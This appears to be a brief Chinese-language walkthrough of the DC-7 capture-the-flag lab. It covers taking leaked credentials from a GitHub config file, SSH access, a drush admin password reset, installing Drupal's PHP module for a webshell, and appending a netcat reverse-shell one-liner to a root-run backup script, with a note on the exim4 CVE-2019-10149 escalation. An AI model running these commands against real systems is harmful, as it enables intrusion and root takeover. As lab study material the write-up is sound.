根据线索找到Dc7User，https://github.com/Dc7User/staffdb，查看config.php得到dc7user口令MdR3xOgB7#dW，于是SSH登录
修改后台密码并登录
drush user-password admin --password="123456"
发现只支持静态页面，于是下载php组件https://www.drupal.org/project/php，在Extend->Install new module里面安装它，写入反弹webshell
echo "mkfifo /tmp/bqro; nc 192.168.56.1 7373 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> /opt/scripts/backups.sh
也可以用exim4的CVE-2019-10149漏洞成功提权
